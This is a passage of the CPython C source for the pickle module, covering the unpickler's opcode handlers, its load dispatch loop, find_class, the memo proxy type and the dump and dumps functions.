slice = Pdata_poplist(self->stack, x);
if (!slice) {
Py_DECREF(extend_func);
return -1;
}
result = _Pickle_FastCall(extend_func, slice);
Py_DECREF(extend_func);
if (result == NULL)
return -1;
Py_DECREF(result);
}
else {
PyObject *append_func;
_Py_IDENTIFIER(append);
/* Even if the PEP 307 requires extend() and append() methods,
fall back on append() if the object has no extend() method
for backward compatibility. */
PyErr_Clear();
append_func = _PyObject_GetAttrId(list, &PyId_append);
if (append_func == NULL)
return -1;
for (i = x; i < len; i++) {
value = self->stack->data[i];
result = _Pickle_FastCall(append_func, value);
if (result == NULL) {
Pdata_clear(self->stack, i + 1);
Py_SIZE(self->stack) = x;
Py_DECREF(append_func);
return -1;
}
Py_DECREF(result);
}
Py_SIZE(self->stack) = x;
Py_DECREF(append_func);
}
}
return 0;
}
static int
load_append(UnpicklerObject *self)
{
if (Py_SIZE(self->stack) - 1 <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
return do_append(self, Py_SIZE(self->stack) - 1);
}
static int
load_appends(UnpicklerObject *self)
{
Py_ssize_t i = marker(self);
if (i < 0)
return -1;
return do_append(self, i);
}
static int
do_setitems(UnpicklerObject *self, Py_ssize_t x)
{
PyObject *value, *key;
PyObject *dict;
Py_ssize_t len, i;
int status = 0;
len = Py_SIZE(self->stack);
if (x > len || x <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
if (len == x) /* nothing to do */
return 0;
if ((len - x) % 2 != 0) {
PickleState *st = _Pickle_GetGlobalState();
/* Currupt or hostile pickle -- we never write one like this. */
PyErr_SetString(st->UnpicklingError,
"odd number of items for SETITEMS");
return -1;
}
/* Here, dict does not actually need to be a PyDict; it could be anything
that supports the __setitem__ attribute. */
dict = self->stack->data[x - 1];
for (i = x + 1; i < len; i += 2) {
key = self->stack->data[i - 1];
value = self->stack->data[i];
if (PyObject_SetItem(dict, key, value) < 0) {
status = -1;
break;
}
}
Pdata_clear(self->stack, x);
return status;
}
static int
load_setitem(UnpicklerObject *self)
{
return do_setitems(self, Py_SIZE(self->stack) - 2);
}
static int
load_setitems(UnpicklerObject *self)
{
Py_ssize_t i = marker(self);
if (i < 0)
return -1;
return do_setitems(self, i);
}
static int
load_additems(UnpicklerObject *self)
{
PyObject *set;
Py_ssize_t mark, len, i;
mark = marker(self);
if (mark < 0)
return -1;
len = Py_SIZE(self->stack);
if (mark > len || mark <= self->stack->fence)
return Pdata_stack_underflow(self->stack);
if (len == mark) /* nothing to do */
return 0;
set = self->stack->data[mark - 1];
if (PySet_Check(set)) {
PyObject *items;
int status;
items = Pdata_poptuple(self->stack, mark);
if (items == NULL)
return -1;
status = _PySet_Update(set, items);
Py_DECREF(items);
return status;
}
else {
PyObject *add_func;
_Py_IDENTIFIER(add);
add_func = _PyObject_GetAttrId(set, &PyId_add);
if (add_func == NULL)
return -1;
for (i = mark; i < len; i++) {
PyObject *result;
PyObject *item;
item = self->stack->data[i];
result = _Pickle_FastCall(add_func, item);
if (result == NULL) {
Pdata_clear(self->stack, i + 1);
Py_SIZE(self->stack) = mark;
return -1;
}
Py_DECREF(result);
}
Py_SIZE(self->stack) = mark;
}
return 0;
}
static int
load_build(UnpicklerObject *self)
{
PyObject *state, *inst, *slotstate;
PyObject *setstate;
int status = 0;
_Py_IDENTIFIER(__setstate__);
/* Stack is ... instance, state. We want to leave instance at
* the stack top, possibly mutated via instance.__setstate__(state).
*/
if (Py_SIZE(self->stack) - 2 < self->stack->fence)
return Pdata_stack_underflow(self->stack);
PDATA_POP(self->stack, state);
if (state == NULL)
return -1;
inst = self->stack->data[Py_SIZE(self->stack) - 1];
if (_PyObject_LookupAttrId(inst, &PyId___setstate__, &setstate) < 0) {
Py_DECREF(state);
return -1;
}
if (setstate != NULL) {
PyObject *result;
/* The explicit __setstate__ is responsible for everything. */
result = _Pickle_FastCall(setstate, state);
Py_DECREF(setstate);
if (result == NULL)
return -1;
Py_DECREF(result);
return 0;
}
/* A default __setstate__. First see whether state embeds a
* slot state dict too (a proto 2 addition).
*/
if (PyTuple_Check(state) && PyTuple_GET_SIZE(state) == 2) {
PyObject *tmp = state;
state = PyTuple_GET_ITEM(tmp, 0);
slotstate = PyTuple_GET_ITEM(tmp, 1);
Py_INCREF(state);
Py_INCREF(slotstate);
Py_DECREF(tmp);
}
else
slotstate = NULL;
/* Set inst.__dict__ from the state dict (if any). */
if (state != Py_None) {
PyObject *dict;
PyObject *d_key, *d_value;
Py_ssize_t i;
_Py_IDENTIFIER(__dict__);
if (!PyDict_Check(state)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError, "state is not a dictionary");
goto error;
}
dict = _PyObject_GetAttrId(inst, &PyId___dict__);
if (dict == NULL)
goto error;
i = 0;
while (PyDict_Next(state, &i, &d_key, &d_value)) {
/* normally the keys for instance attributes are
interned. we should try to do that here. */
Py_INCREF(d_key);
if (PyUnicode_CheckExact(d_key))
PyUnicode_InternInPlace(&d_key);
if (PyObject_SetItem(dict, d_key, d_value) < 0) {
Py_DECREF(d_key);
goto error;
}
Py_DECREF(d_key);
}
Py_DECREF(dict);
}
/* Also set instance attributes from the slotstate dict (if any). */
if (slotstate != NULL) {
PyObject *d_key, *d_value;
Py_ssize_t i;
if (!PyDict_Check(slotstate)) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_SetString(st->UnpicklingError,
"slot state is not a dictionary");
goto error;
}
i = 0;
while (PyDict_Next(slotstate, &i, &d_key, &d_value)) {
if (PyObject_SetAttr(inst, d_key, d_value) < 0)
goto error;
}
}
if (0) {
error:
status = -1;
}
Py_DECREF(state);
Py_XDECREF(slotstate);
return status;
}
static int
load_mark(UnpicklerObject *self)
{
/* Note that we split the (pickle.py) stack into two stacks, an
* object stack and a mark stack. Here we push a mark onto the
* mark stack.
*/
if (self->num_marks >= self->marks_size) {
size_t alloc = ((size_t)self->num_marks << 1) + 20;
Py_ssize_t *marks_new = self->marks;
PyMem_RESIZE(marks_new, Py_ssize_t, alloc);
if (marks_new == NULL) {
PyErr_NoMemory();
return -1;
}
self->marks = marks_new;
self->marks_size = (Py_ssize_t)alloc;
}
self->stack->mark_set = 1;
self->marks[self->num_marks++] = self->stack->fence = Py_SIZE(self->stack);
return 0;
}
static int
load_reduce(UnpicklerObject *self)
{
PyObject *callable = NULL;
PyObject *argtup = NULL;
PyObject *obj = NULL;
PDATA_POP(self->stack, argtup);
if (argtup == NULL)
return -1;
PDATA_POP(self->stack, callable);
if (callable) {
obj = PyObject_CallObject(callable, argtup);
Py_DECREF(callable);
}
Py_DECREF(argtup);
if (obj == NULL)
return -1;
PDATA_PUSH(self->stack, obj, -1);
return 0;
}
/* Just raises an error if we don't know the protocol specified. PROTO
* is the first opcode for protocols >= 2.
*/
static int
load_proto(UnpicklerObject *self)
{
char *s;
int i;
if (_Unpickler_Read(self, &s, 1) < 0)
return -1;
i = (unsigned char)s[0];
if (i <= HIGHEST_PROTOCOL) {
self->proto = i;
return 0;
}
PyErr_Format(PyExc_ValueError, "unsupported pickle protocol: %d", i);
return -1;
}
static int
load_frame(UnpicklerObject *self)
{
char *s;
Py_ssize_t frame_len;
if (_Unpickler_Read(self, &s, 8) < 0)
return -1;
frame_len = calc_binsize(s, 8);
if (frame_len < 0) {
PyErr_Format(PyExc_OverflowError,
"FRAME length exceeds system's maximum of %zd bytes",
PY_SSIZE_T_MAX);
return -1;
}
if (_Unpickler_Read(self, &s, frame_len) < 0)
return -1;
/* Rewind to start of frame */
self->next_read_idx -= frame_len;
return 0;
}
static PyObject *
load(UnpicklerObject *self)
{
PyObject *value = NULL;
char *s = NULL;
self->num_marks = 0;
self->stack->mark_set = 0;
self->stack->fence = 0;
self->proto = 0;
if (Py_SIZE(self->stack))
Pdata_clear(self->stack, 0);
/* Convenient macros for the dispatch while-switch loop just below. */
#define OP(opcode, load_func) \
case opcode: if (load_func(self) < 0) break; continue;
#define OP_ARG(opcode, load_func, arg) \
case opcode: if (load_func(self, (arg)) < 0) break; continue;
while (1) {
if (_Unpickler_Read(self, &s, 1) < 0) {
PickleState *st = _Pickle_GetGlobalState();
if (PyErr_ExceptionMatches(st->UnpicklingError)) {
PyErr_Format(PyExc_EOFError, "Ran out of input");
}
return NULL;
}
switch ((enum opcode)s[0]) {
OP(NONE, load_none)
OP(BININT, load_binint)
OP(BININT1, load_binint1)
OP(BININT2, load_binint2)
OP(INT, load_int)
OP(LONG, load_long)
OP_ARG(LONG1, load_counted_long, 1)
OP_ARG(LONG4, load_counted_long, 4)
OP(FLOAT, load_float)
OP(BINFLOAT, load_binfloat)
OP_ARG(SHORT_BINBYTES, load_counted_binbytes, 1)
OP_ARG(BINBYTES, load_counted_binbytes, 4)
OP_ARG(BINBYTES8, load_counted_binbytes, 8)
OP_ARG(SHORT_BINSTRING, load_counted_binstring, 1)
OP_ARG(BINSTRING, load_counted_binstring, 4)
OP(STRING, load_string)
OP(UNICODE, load_unicode)
OP_ARG(SHORT_BINUNICODE, load_counted_binunicode, 1)
OP_ARG(BINUNICODE, load_counted_binunicode, 4)
OP_ARG(BINUNICODE8, load_counted_binunicode, 8)
OP_ARG(EMPTY_TUPLE, load_counted_tuple, 0)
OP_ARG(TUPLE1, load_counted_tuple, 1)
OP_ARG(TUPLE2, load_counted_tuple, 2)
OP_ARG(TUPLE3, load_counted_tuple, 3)
OP(TUPLE, load_tuple)
OP(EMPTY_LIST, load_empty_list)
OP(LIST, load_list)
OP(EMPTY_DICT, load_empty_dict)
OP(DICT, load_dict)
OP(EMPTY_SET, load_empty_set)
OP(ADDITEMS, load_additems)
OP(FROZENSET, load_frozenset)
OP(OBJ, load_obj)
OP(INST, load_inst)
OP(NEWOBJ, load_newobj)
OP(NEWOBJ_EX, load_newobj_ex)
OP(GLOBAL, load_global)
OP(STACK_GLOBAL, load_stack_global)
OP(APPEND, load_append)
OP(APPENDS, load_appends)
OP(BUILD, load_build)
OP(DUP, load_dup)
OP(BINGET, load_binget)
OP(LONG_BINGET, load_long_binget)
OP(GET, load_get)
OP(MARK, load_mark)
OP(BINPUT, load_binput)
OP(LONG_BINPUT, load_long_binput)
OP(PUT, load_put)
OP(MEMOIZE, load_memoize)
OP(POP, load_pop)
OP(POP_MARK, load_pop_mark)
OP(SETITEM, load_setitem)
OP(SETITEMS, load_setitems)
OP(PERSID, load_persid)
OP(BINPERSID, load_binpersid)
OP(REDUCE, load_reduce)
OP(PROTO, load_proto)
OP(FRAME, load_frame)
OP_ARG(EXT1, load_extension, 1)
OP_ARG(EXT2, load_extension, 2)
OP_ARG(EXT4, load_extension, 4)
OP_ARG(NEWTRUE, load_bool, Py_True)
OP_ARG(NEWFALSE, load_bool, Py_False)
case STOP:
break;
default:
{
PickleState *st = _Pickle_GetGlobalState();
unsigned char c = (unsigned char) *s;
if (0x20 <= c && c <= 0x7e && c != '\'' && c != '\\') {
PyErr_Format(st->UnpicklingError,
"invalid load key, '%c'.", c);
}
else {
PyErr_Format(st->UnpicklingError,
"invalid load key, '\\x%02x'.", c);
}
return NULL;
}
}
break; /* and we are done! */
}
if (PyErr_Occurred()) {
return NULL;
}
if (_Unpickler_SkipConsumed(self) < 0)
return NULL;
PDATA_POP(self->stack, value);
return value;
}
/*[clinic input]
_pickle.Unpickler.load
Load a pickle.
Read a pickled object representation from the open file object given
in the constructor, and return the reconstituted object hierarchy
specified therein.
[clinic start generated code]*/
static PyObject *
_pickle_Unpickler_load_impl(UnpicklerObject *self)
/*[clinic end generated code: output=fdcc488aad675b14 input=acbb91a42fa9b7b9]*/
{
UnpicklerObject *unpickler = (UnpicklerObject*)self;
/* Check whether the Unpickler was initialized correctly. This prevents
segfaulting if a subclass overridden __init__ with a function that does
not call Unpickler.__init__(). Here, we simply ensure that self->read
is not NULL. */
if (unpickler->read == NULL) {
PickleState *st = _Pickle_GetGlobalState();
PyErr_Format(st->UnpicklingError,
"Unpickler.__init__() was not called by %s.__init__()",
Py_TYPE(unpickler)->tp_name);
return NULL;
}
return load(unpickler);
}
/* The name of find_class() is misleading. In newer pickle protocols, this
function is used for loading any global (i.e., functions), not just
classes. The name is kept only for backward compatibility. */
/*[clinic input]
_pickle.Unpickler.find_class
module_name: object
global_name: object
/
Return an object from a specified module.
If necessary, the module will be imported. Subclasses may override
this method (e.g. to restrict unpickling of arbitrary classes and
functions).
This method is called whenever a class or a function object is
needed. Both arguments passed are str objects.
[clinic start generated code]*/
static PyObject *
_pickle_Unpickler_find_class_impl(UnpicklerObject *self,
PyObject *module_name,
PyObject *global_name)
/*[clinic end generated code: output=becc08d7f9ed41e3 input=e2e6a865de093ef4]*/
{
PyObject *global;
PyObject *module;
/* Try to map the old names used in Python 2.x to the new ones used in
Python 3.x. We do this only with old pickle protocols and when the
user has not disabled the feature. */
if (self->proto < 3 && self->fix_imports) {
PyObject *key;
PyObject *item;
PickleState *st = _Pickle_GetGlobalState();
/* Check if the global (i.e., a function or a class) was renamed
or moved to another module. */
key = PyTuple_Pack(2, module_name, global_name);
if (key == NULL)
return NULL;
item = PyDict_GetItemWithError(st->name_mapping_2to3, key);
Py_DECREF(key);
if (item) {
if (!PyTuple_Check(item) || PyTuple_GET_SIZE(item) != 2) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.NAME_MAPPING values should be "
"2-tuples, not %.200s", Py_TYPE(item)->tp_name);
return NULL;
}
module_name = PyTuple_GET_ITEM(item, 0);
global_name = PyTuple_GET_ITEM(item, 1);
if (!PyUnicode_Check(module_name) ||
!PyUnicode_Check(global_name)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.NAME_MAPPING values should be "
"pairs of str, not (%.200s, %.200s)",
Py_TYPE(module_name)->tp_name,
Py_TYPE(global_name)->tp_name);
return NULL;
}
}
else if (PyErr_Occurred()) {
return NULL;
}
else {
/* Check if the module was renamed. */
item = PyDict_GetItemWithError(st->import_mapping_2to3, module_name);
if (item) {
if (!PyUnicode_Check(item)) {
PyErr_Format(PyExc_RuntimeError,
"_compat_pickle.IMPORT_MAPPING values should be "
"strings, not %.200s", Py_TYPE(item)->tp_name);
return NULL;
}
module_name = item;
}
else if (PyErr_Occurred()) {
return NULL;
}
}
}
module = PyImport_GetModule(module_name);
if (module == NULL) {
if (PyErr_Occurred())
return NULL;
module = PyImport_Import(module_name);
if (module == NULL)
return NULL;
}
global = getattribute(module, global_name, self->proto >= 4);
Py_DECREF(module);
return global;
}
/*[clinic input]
_pickle.Unpickler.__sizeof__ -> Py_ssize_t
Returns size in memory, in bytes.
[clinic start generated code]*/
static Py_ssize_t
_pickle_Unpickler___sizeof___impl(UnpicklerObject *self)
/*[clinic end generated code: output=119d9d03ad4c7651 input=13333471fdeedf5e]*/
{
Py_ssize_t res;
res = _PyObject_SIZE(Py_TYPE(self));
if (self->memo != NULL)
res += self->memo_size * sizeof(PyObject *);
if (self->marks != NULL)
res += self->marks_size * sizeof(Py_ssize_t);
if (self->input_line != NULL)
res += strlen(self->input_line) + 1;
if (self->encoding != NULL)
res += strlen(self->encoding) + 1;
if (self->errors != NULL)
res += strlen(self->errors) + 1;
return res;
}
static struct PyMethodDef Unpickler_methods[] = {
_PICKLE_UNPICKLER_LOAD_METHODDEF
_PICKLE_UNPICKLER_FIND_CLASS_METHODDEF
_PICKLE_UNPICKLER___SIZEOF___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
Unpickler_dealloc(UnpicklerObject *self)
{
PyObject_GC_UnTrack((PyObject *)self);
Py_XDECREF(self->readline);
Py_XDECREF(self->read);
Py_XDECREF(self->peek);
Py_XDECREF(self->stack);
Py_XDECREF(self->pers_func);
if (self->buffer.buf != NULL) {
PyBuffer_Release(&self->buffer);
self->buffer.buf = NULL;
}
_Unpickler_MemoCleanup(self);
PyMem_Free(self->marks);
PyMem_Free(self->input_line);
PyMem_Free(self->encoding);
PyMem_Free(self->errors);
Py_TYPE(self)->tp_free((PyObject *)self);
}
static int
Unpickler_traverse(UnpicklerObject *self, visitproc visit, void *arg)
{
Py_VISIT(self->readline);
Py_VISIT(self->read);
Py_VISIT(self->peek);
Py_VISIT(self->stack);
Py_VISIT(self->pers_func);
return 0;
}
static int
Unpickler_clear(UnpicklerObject *self)
{
Py_CLEAR(self->readline);
Py_CLEAR(self->read);
Py_CLEAR(self->peek);
Py_CLEAR(self->stack);
Py_CLEAR(self->pers_func);
if (self->buffer.buf != NULL) {
PyBuffer_Release(&self->buffer);
self->buffer.buf = NULL;
}
_Unpickler_MemoCleanup(self);
PyMem_Free(self->marks);
self->marks = NULL;
PyMem_Free(self->input_line);
self->input_line = NULL;
PyMem_Free(self->encoding);
self->encoding = NULL;
PyMem_Free(self->errors);
self->errors = NULL;
return 0;
}
/*[clinic input]
_pickle.Unpickler.__init__
file: object
*
fix_imports: bool = True
encoding: str = 'ASCII'
errors: str = 'strict'
This takes a binary file for reading a pickle data stream.
The protocol version of the pickle is detected automatically, so no
protocol argument is needed. Bytes past the pickled object's
representation are ignored.
The argument *file* must have two methods, a read() method that takes
an integer argument, and a readline() method that requires no
arguments. Both methods should return bytes. Thus *file* can be a
binary file object opened for reading, an io.BytesIO object, or any
other custom object that meets this interface.
Optional keyword arguments are *fix_imports*, *encoding* and *errors*,
which are used to control compatibility support for pickle stream
generated by Python 2. If *fix_imports* is True, pickle will try to
map the old Python 2 names to the new names used in Python 3. The
*encoding* and *errors* tell pickle how to decode 8-bit string
instances pickled by Python 2; these default to 'ASCII' and 'strict',
respectively. The *encoding* can be 'bytes' to read these 8-bit
string instances as bytes objects.
[clinic start generated code]*/
static int
_pickle_Unpickler___init___impl(UnpicklerObject *self, PyObject *file,
int fix_imports, const char *encoding,
const char *errors)
/*[clinic end generated code: output=e2c8ce748edc57b0 input=f9b7da04f5f4f335]*/
{
_Py_IDENTIFIER(persistent_load);
/* In case of multiple __init__() calls, clear previous content. */
if (self->read != NULL)
(void)Unpickler_clear(self);
if (_Unpickler_SetInputStream(self, file) < 0)
return -1;
if (_Unpickler_SetInputEncoding(self, encoding, errors) < 0)
return -1;
self->fix_imports = fix_imports;
if (init_method_ref((PyObject *)self, &PyId_persistent_load,
&self->pers_func, &self->pers_func_self) < 0)
{
return -1;
}
self->stack = (Pdata *)Pdata_New();
if (self->stack == NULL)
return 1;
self->memo_size = 32;
self->memo = _Unpickler_NewMemo(self->memo_size);
if (self->memo == NULL)
return -1;
self->proto = 0;
return 0;
}
/* Define a proxy object for the Unpickler's internal memo object. This is to
* avoid breaking code like:
* unpickler.memo.clear()
* and
* unpickler.memo = saved_memo
* Is this a good idea? Not really, but we don't want to break code that uses
* it. Note that we don't implement the entire mapping API here. This is
* intentional, as these should be treated as black-box implementation details.
*
* We do, however, have to implement pickling/unpickling support because of
* real-world code like cvs2svn.
*/
/*[clinic input]
_pickle.UnpicklerMemoProxy.clear
Remove all items from memo.
[clinic start generated code]*/
static PyObject *
_pickle_UnpicklerMemoProxy_clear_impl(UnpicklerMemoProxyObject *self)
/*[clinic end generated code: output=d20cd43f4ba1fb1f input=b1df7c52e7afd9bd]*/
{
_Unpickler_MemoCleanup(self->unpickler);
self->unpickler->memo = _Unpickler_NewMemo(self->unpickler->memo_size);
if (self->unpickler->memo == NULL)
return NULL;
Py_RETURN_NONE;
}
/*[clinic input]
_pickle.UnpicklerMemoProxy.copy
Copy the memo to a new object.
[clinic start generated code]*/
static PyObject *
_pickle_UnpicklerMemoProxy_copy_impl(UnpicklerMemoProxyObject *self)
/*[clinic end generated code: output=e12af7e9bc1e4c77 input=97769247ce032c1d]*/
{
Py_ssize_t i;
PyObject *new_memo = PyDict_New();
if (new_memo == NULL)
return NULL;
for (i = 0; i < self->unpickler->memo_size; i++) {
int status;
PyObject *key, *value;
value = self->unpickler->memo[i];
if (value == NULL)
continue;
key = PyLong_FromSsize_t(i);
if (key == NULL)
goto error;
status = PyDict_SetItem(new_memo, key, value);
Py_DECREF(key);
if (status < 0)
goto error;
}
return new_memo;
error:
Py_DECREF(new_memo);
return NULL;
}
/*[clinic input]
_pickle.UnpicklerMemoProxy.__reduce__
Implement pickling support.
[clinic start generated code]*/
static PyObject *
_pickle_UnpicklerMemoProxy___reduce___impl(UnpicklerMemoProxyObject *self)
/*[clinic end generated code: output=6da34ac048d94cca input=6920862413407199]*/
{
PyObject *reduce_value;
PyObject *constructor_args;
PyObject *contents = _pickle_UnpicklerMemoProxy_copy_impl(self);
if (contents == NULL)
return NULL;
reduce_value = PyTuple_New(2);
if (reduce_value == NULL) {
Py_DECREF(contents);
return NULL;
}
constructor_args = PyTuple_New(1);
if (constructor_args == NULL) {
Py_DECREF(contents);
Py_DECREF(reduce_value);
return NULL;
}
PyTuple_SET_ITEM(constructor_args, 0, contents);
Py_INCREF((PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 0, (PyObject *)&PyDict_Type);
PyTuple_SET_ITEM(reduce_value, 1, constructor_args);
return reduce_value;
}
static PyMethodDef unpicklerproxy_methods[] = {
_PICKLE_UNPICKLERMEMOPROXY_CLEAR_METHODDEF
_PICKLE_UNPICKLERMEMOPROXY_COPY_METHODDEF
_PICKLE_UNPICKLERMEMOPROXY___REDUCE___METHODDEF
{NULL, NULL} /* sentinel */
};
static void
UnpicklerMemoProxy_dealloc(UnpicklerMemoProxyObject *self)
{
PyObject_GC_UnTrack(self);
Py_XDECREF(self->unpickler);
PyObject_GC_Del((PyObject *)self);
}
static int
UnpicklerMemoProxy_traverse(UnpicklerMemoProxyObject *self,
visitproc visit, void *arg)
{
Py_VISIT(self->unpickler);
return 0;
}
static int
UnpicklerMemoProxy_clear(UnpicklerMemoProxyObject *self)
{
Py_CLEAR(self->unpickler);
return 0;
}
static PyTypeObject UnpicklerMemoProxyType = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.UnpicklerMemoProxy", /*tp_name*/
sizeof(UnpicklerMemoProxyObject), /*tp_basicsize*/
0,
(destructor)UnpicklerMemoProxy_dealloc, /* tp_dealloc */
0, /* tp_print */
0, /* tp_getattr */
0, /* tp_setattr */
0, /* tp_compare */
0, /* tp_repr */
0, /* tp_as_number */
0, /* tp_as_sequence */
0, /* tp_as_mapping */
PyObject_HashNotImplemented, /* tp_hash */
0, /* tp_call */
0, /* tp_str */
PyObject_GenericGetAttr, /* tp_getattro */
PyObject_GenericSetAttr, /* tp_setattro */
0, /* tp_as_buffer */
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
0, /* tp_doc */
(traverseproc)UnpicklerMemoProxy_traverse, /* tp_traverse */
(inquiry)UnpicklerMemoProxy_clear, /* tp_clear */
0, /* tp_richcompare */
0, /* tp_weaklistoffset */
0, /* tp_iter */
0, /* tp_iternext */
unpicklerproxy_methods, /* tp_methods */
};
static PyObject *
UnpicklerMemoProxy_New(UnpicklerObject *unpickler)
{
UnpicklerMemoProxyObject *self;
self = PyObject_GC_New(UnpicklerMemoProxyObject,
&UnpicklerMemoProxyType);
if (self == NULL)
return NULL;
Py_INCREF(unpickler);
self->unpickler = unpickler;
PyObject_GC_Track(self);
return (PyObject *)self;
}
/*****************************************************************************/
static PyObject *
Unpickler_get_memo(UnpicklerObject *self)
{
return UnpicklerMemoProxy_New(self);
}
static int
Unpickler_set_memo(UnpicklerObject *self, PyObject *obj)
{
PyObject **new_memo;
Py_ssize_t new_memo_size = 0;
Py_ssize_t i;
if (obj == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (Py_TYPE(obj) == &UnpicklerMemoProxyType) {
UnpicklerObject *unpickler =
((UnpicklerMemoProxyObject *)obj)->unpickler;
new_memo_size = unpickler->memo_size;
new_memo = _Unpickler_NewMemo(new_memo_size);
if (new_memo == NULL)
return -1;
for (i = 0; i < new_memo_size; i++) {
Py_XINCREF(unpickler->memo[i]);
new_memo[i] = unpickler->memo[i];
}
}
else if (PyDict_Check(obj)) {
Py_ssize_t i = 0;
PyObject *key, *value;
new_memo_size = PyDict_GET_SIZE(obj);
new_memo = _Unpickler_NewMemo(new_memo_size);
if (new_memo == NULL)
return -1;
while (PyDict_Next(obj, &i, &key, &value)) {
Py_ssize_t idx;
if (!PyLong_Check(key)) {
PyErr_SetString(PyExc_TypeError,
"memo key must be integers");
goto error;
}
idx = PyLong_AsSsize_t(key);
if (idx == -1 && PyErr_Occurred())
goto error;
if (idx < 0) {
PyErr_SetString(PyExc_ValueError,
"memo key must be positive integers.");
goto error;
}
if (_Unpickler_MemoPut(self, idx, value) < 0)
goto error;
}
}
else {
PyErr_Format(PyExc_TypeError,
"'memo' attribute must be an UnpicklerMemoProxy object"
"or dict, not %.200s", Py_TYPE(obj)->tp_name);
return -1;
}
_Unpickler_MemoCleanup(self);
self->memo_size = new_memo_size;
self->memo = new_memo;
return 0;
error:
if (new_memo_size) {
i = new_memo_size;
while (--i >= 0) {
Py_XDECREF(new_memo[i]);
}
PyMem_FREE(new_memo);
}
return -1;
}
static PyObject *
Unpickler_get_persload(UnpicklerObject *self)
{
if (self->pers_func == NULL) {
PyErr_SetString(PyExc_AttributeError, "persistent_load");
return NULL;
}
return reconstruct_method(self->pers_func, self->pers_func_self);
}
static int
Unpickler_set_persload(UnpicklerObject *self, PyObject *value)
{
if (value == NULL) {
PyErr_SetString(PyExc_TypeError,
"attribute deletion is not supported");
return -1;
}
if (!PyCallable_Check(value)) {
PyErr_SetString(PyExc_TypeError,
"persistent_load must be a callable taking "
"one argument");
return -1;
}
self->pers_func_self = NULL;
Py_INCREF(value);
Py_XSETREF(self->pers_func, value);
return 0;
}
static PyGetSetDef Unpickler_getsets[] = {
{"memo", (getter)Unpickler_get_memo, (setter)Unpickler_set_memo},
{"persistent_load", (getter)Unpickler_get_persload,
(setter)Unpickler_set_persload},
{NULL}
};
static PyTypeObject Unpickler_Type = {
PyVarObject_HEAD_INIT(NULL, 0)
"_pickle.Unpickler", /*tp_name*/
sizeof(UnpicklerObject), /*tp_basicsize*/
0, /*tp_itemsize*/
(destructor)Unpickler_dealloc, /*tp_dealloc*/
0, /*tp_print*/
0, /*tp_getattr*/
0, /*tp_setattr*/
0, /*tp_reserved*/
0, /*tp_repr*/
0, /*tp_as_number*/
0, /*tp_as_sequence*/
0, /*tp_as_mapping*/
0, /*tp_hash*/
0, /*tp_call*/
0, /*tp_str*/
0, /*tp_getattro*/
0, /*tp_setattro*/
0, /*tp_as_buffer*/
Py_TPFLAGS_DEFAULT | Py_TPFLAGS_BASETYPE | Py_TPFLAGS_HAVE_GC,
_pickle_Unpickler___init____doc__, /*tp_doc*/
(traverseproc)Unpickler_traverse, /*tp_traverse*/
(inquiry)Unpickler_clear, /*tp_clear*/
0, /*tp_richcompare*/
0, /*tp_weaklistoffset*/
0, /*tp_iter*/
0, /*tp_iternext*/
Unpickler_methods, /*tp_methods*/
0, /*tp_members*/
Unpickler_getsets, /*tp_getset*/
0, /*tp_base*/
0, /*tp_dict*/
0, /*tp_descr_get*/
0, /*tp_descr_set*/
0, /*tp_dictoffset*/
_pickle_Unpickler___init__, /*tp_init*/
PyType_GenericAlloc, /*tp_alloc*/
PyType_GenericNew, /*tp_new*/
PyObject_GC_Del, /*tp_free*/
0, /*tp_is_gc*/
};
/*[clinic input]
_pickle.dump
obj: object
file: object
protocol: object = NULL
*
fix_imports: bool = True
Write a pickled representation of obj to the open file object file.
This is equivalent to ``Pickler(file, protocol).dump(obj)``, but may
be more efficient.
The optional *protocol* argument tells the pickler to use the given
protocol; supported protocols are 0, 1, 2, 3 and 4. The default
protocol is 4. It was introduced in Python 3.4, it is incompatible
with previous versions.
Specifying a negative protocol version selects the highest protocol
version supported. The higher the protocol used, the more recent the
version of Python needed to read the pickle produced.
The *file* argument must have a write() method that accepts a single
bytes argument. It can thus be a file object opened for binary
writing, an io.BytesIO instance, or any other custom object that meets
this interface.
If *fix_imports* is True and protocol is less than 3, pickle will try
to map the new Python 3 names to the old module names used in Python
2, so that the pickle data stream is readable with Python 2.
[clinic start generated code]*/
static PyObject *
_pickle_dump_impl(PyObject *module, PyObject *obj, PyObject *file,
PyObject *protocol, int fix_imports)
/*[clinic end generated code: output=a4774d5fde7d34de input=93f1408489a87472]*/
{
PicklerObject *pickler = _Pickler_New();
if (pickler == NULL)
return NULL;
if (_Pickler_SetProtocol(pickler, protocol, fix_imports) < 0)
goto error;
if (_Pickler_SetOutputStream(pickler, file) < 0)
goto error;
if (dump(pickler, obj) < 0)
goto error;
if (_Pickler_FlushToFile(pickler) < 0)
goto error;
Py_DECREF(pickler);
Py_RETURN_NONE;
error:
Py_XDECREF(pickler);
return NULL;
}
/*[clinic input]
_pickle.dumps
obj: object
protocol: object = NULL
*
fix_imports: bool = True
Return the pickled representation of the object as a bytes object.
The optional *protocol* argument tells the pickler to use the given
protocol; supported protocols are 0, 1, 2, 3 and 4. The default
protocol is 4. It was introduced in Python 3.4, it is incompatible
with previous versions.
Specifying a negative protocol version selects the highest protocol
version supported. The higher the protocol used, the more recent the
version of Python needed to read the pickle produced.
If *fix_imports* is True and *protocol* is less than 3, pickle will
try to map the new Python 3 names to the old module names used in
Python 2, so that the pickle data stream is readable with Python 2.
[clinic start generated code]*/
static PyObject *
_pickle_dumps_impl(PyObject *module, PyObject *obj, PyObject *protocol,
int fix_imports)
/*[clinic end generated code: output=d75d5cda456fd261 input=b6efb45a7d19b5ab]*/
{
PyObject *result;
PicklerObject *pickler = _Pickler_New();
if (pickler == NULL)
return NULL;
if (_Pickler_SetProtocol(pickler, protocol, fix_imports) < 0)
goto error;
if (dump(pickler, obj) < 0)
goto error;
result = _Pickler_GetString(pickler);
Py_DECREF(pickler);
return result;
error:
Py_XDECREF(pickler);
return NULL;
}
/*[clinic input]
_pickle.load
file: object
*
fix_imports: bool = True
